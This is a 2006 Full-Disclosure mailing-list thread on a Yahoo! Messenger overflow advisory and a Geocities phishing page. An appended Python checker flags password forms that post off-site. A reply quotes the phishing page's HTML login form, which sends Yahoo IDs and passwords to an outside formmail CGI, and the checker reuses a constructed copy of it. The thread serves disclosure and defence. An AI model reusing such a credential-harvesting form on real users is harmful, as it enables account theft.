Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability

2006-10-27 Thread Jain, Siddhartha
Did Yahoo put out a security notification yet? I don't see any mention
of a bug fix on the yahoo messenger page. And when I turn on my yahoo
messenger (ver 8.0.0.701), shouldn't I be alerted to receive an update?

- Siddhartha



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gadi
Evron
Sent: Thursday, October 26, 2006 7:46 AM
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer
Overflow Vulnerability

On Thu, 26 Oct 2006 [EMAIL PROTECTED] wrote:
> So how fast is this record time? As fast as Hitler's Blitzkrieg
> tactics? That's pretty fast!

Yahoo! released a fixed version.

Gadi.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability

2006-10-24 Thread Jain, Siddhartha
Hi,

Does anyone have more information on this issue?

<snip>
http://www.securityfocus.com/bid/20625/discuss
Yahoo! Messenger is prone to a remote buffer-overflow vulnerability
because it fails to properly bounds-check user-supplied data before
copying it to an insufficiently sized memory buffer.

This vulnerability allows remote attackers to execute arbitrary machine
code in the context of the affected application. Failed exploit attempts
will likely crash the server, denying further service to legitimate
users.

Yahoo! Messenger 8 with Voice is vulnerable.
</snip>


I could not find this vulnerability reported on any other place than
bugtraq (say Secunia, iDefense, ISC).


Thanks,

- Siddhartha



RE: [Full-disclosure] Yahoo/Geocities possible exploit/vulnerability

2006-08-14 Thread Jain, Siddhartha
Thanks for the explanation, Nick. Was indeed helpful. I am sure changing
the passwords blunts the attack but it sure feels stupid!!

The phishing apart, how can a userid be spoofed on Yahoo Messenger? Is
this something trivial? I thought Yahoo fixed the issue with Y!Messenger
5.0.


Thanks,

- Siddhartha



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Nick
FitzGerald
Sent: Monday, August 14, 2006 6:01 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Yahoo/Geocities possible
exploit/vulnerability

Jain, Siddhartha wrote:

> I was logged onto Yahoo Messenger (version 7.5 on WinXP SP2 Pro), when I
> got a message from a friend's ID:
> P Bx (8/14/2006 4:25:50 PM):  ---
> www.geocities.com/now_thats_funny_210/
>
> Clicking on the link took me to a page with the URL as above in the
> address bar and yahoo/geocities page that asks for username and
> password. On entering the username and password, the next page displayed
> was my photo album on yahoo but the URL in the address bar still
> remained the same as above!!

D'oh -- you've been phished!

Double-D'oh -- you announced it on Full-Disclosure!!

The URL you were sent is a phishing page.  The form submission code 
looks like the following (brain-damaged smart HTML rendering MUAs may 
start to suck about here -- if that's yours, get a better one):

  <legend>Login Form</legend>
  <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi"
   ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="[EMAIL PROTECTED]">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page"
  value="http://photos.yahoo.com/ph//my_photos">
  [...]

Basically, your Yahoo ID and password were sent to an open formmail 
CGI at fiberbit.net which sent those details (plus some other stuff 
based on reverse DNS, etc of the apparent IP submitting the form) via 
Email to [EMAIL PROTECTED] and then the form-processing CGI 
redirected your browser to your real Yahoo! Photos page, 
http://photos.yahoo.com/ph//my_photos.  If it did this without 
prompting you for login (as it did for me) I guess that means you had 
an already active Yahoo! session in your browser.

> Next thing I noticed was that Yahoo Messenger had frozen.

My guess here is (thankfully I'm not a YIM expert) that YIM only allows 
one login per ID and kicks _old_ ones when a new session is initiated 
from an already active ID.  Thus getting logged out of YIM would mean 
that the bot picking up and processing [EMAIL PROTECTED]'s Emails 
had logged into YIM, presumably to send messages like the one you got 
to your whole contact list.  Lather, rinse, repeat...

> I changed my yahoo password and un-installed Yahoo Messenger.

Damage already done though, methinks.  I mean, good for changing your 
password, but as all I can see this doing for now is spimming that 
link, the damage is done.  Of course, changing your password means that 
they cannot re-use your credentials in future, should they have recorded 
them for possible future use.

I suspect that this was also supposed to try to exploit some or other 
recent-ish IE security vulnerability, but due to incompetence on the 
part of the person setting it up, they fluffed this aspect of the 
intended attack.  I mean, WTF otherwise is the explanation of this 
from the middle of the now_thats_funny_210 page?

  <script language='javascript'
src='http://127.0.0.1:1894/js.cgi?pcawr=4886'></script>

> When I asked my friend about the message, he said he didn't send the
> message but received a similar message from his wife in the morning who
> hadn't sent it either.

They've both already been hit -- be nice and strongly commend them to 
change their passwords and then trace it back from his wife to whoever 
she got it from, et seq...


Regards,

Nick FitzGerald


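Nick's walk-through of the formmail-backed login page suggests a defender-side check. The following is an added example, not code from the thread or from Yahoo/Geocities: it parses a page's forms and flags any password form that posts to a host other than the page's own, or that carries the formmail-style hidden fields (Mail_To, Next_Page) used to mail the submission away and then redirect the victim. The sample form, the page URL and the collector address in it are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hidden-field names typical of open "formmail" CGIs: the submission is mailed
# to Mail_To and the browser is then redirected to Next_Page.
FORMMAIL_FIELDS = {"mail_to", "mail_from", "mail_subject", "next_page"}

class FormCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form>: action URL and inputs
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (a.get("type", "text").lower(), a.get("name", "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def suspicious_forms(page_url, html):
    """Return (action, reasons) for each password form that looks like a drop."""
    page_host = urlparse(page_url).hostname or ""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        reasons = []
        action_host = urlparse(form["action"]).hostname or page_host  # relative = same host
        if action_host != page_host:
            reasons.append(f"posts off-site to {action_host}")
        hits = sorted({n for _, n in form["inputs"]} & FORMMAIL_FIELDS)
        if hits:
            reasons.append("formmail fields: " + ", ".join(hits))
        if reasons and any(t == "password" for t, _ in form["inputs"]):
            findings.append((form["action"], reasons))
    return findings

# Constructed sample modelled on the form quoted in the thread, not the real page.
SAMPLE = """<form method="POST" action="http://www2.fiberbit.net/form/mailto.cgi">
<input type="hidden" name="Mail_To" value="collector@example.invalid">
<input type="hidden" name="Next_Page" value="http://photos.yahoo.com/ph//my_photos">
<input type="text" name="login"><input type="password" name="passwd">
</form>"""
```

A form that posts off-site but collects no password, or a same-host login form without the formmail fields, produces no finding, so the check stays quiet on ordinary sites.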